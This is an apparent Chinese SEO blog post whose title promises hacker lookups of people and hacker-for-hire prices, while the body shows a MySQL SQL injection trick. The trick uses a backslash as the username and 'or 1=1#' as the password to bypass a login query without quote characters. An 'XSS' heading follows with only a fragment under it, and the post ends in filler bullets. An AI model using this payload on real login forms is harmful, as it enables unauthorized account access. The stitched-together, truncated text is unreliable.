黑客教你查询某人信息（找黑客一般费用多少）

在字符型填字游戏中，'和＂往往是决定能否跳出约束进行攻击的关键，于是出现鸟转义字符　\ 

，可以把' ＂变成残废....这恰恰帮助我们改变了字符内部结构 

SQL Injection 

在MYSQL中登陆界面 

$db->query("Select * from a where username='$u' and pass='$p' "); 

想到了万能登陆？但假设这里$u $p不让你输入' 那？ 

这时，我们让　$u为\　 $p为 or 1=1# 

$db->query("Select * from a where username='\' and pass=' or 1=1#' "); 

ＯＫ搞定字符登陆without ' 

当然，只适用MYSQL,貌似坏坏的MS的数据库不给用转义字符．．．．而且那啥magic必须为off，因为它对\也转义．．．．．．．．．．．利用空间超超超小，就当是小小的猜想吧 

Xss 

变通一下 

//" 

版权声明：

1、本文由作者-小六SEO原创发布，保留著作所有权，转载请注明来源，否则谢绝转载;
2、非原创内容会有明确作者及来源标注。

• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·
• ·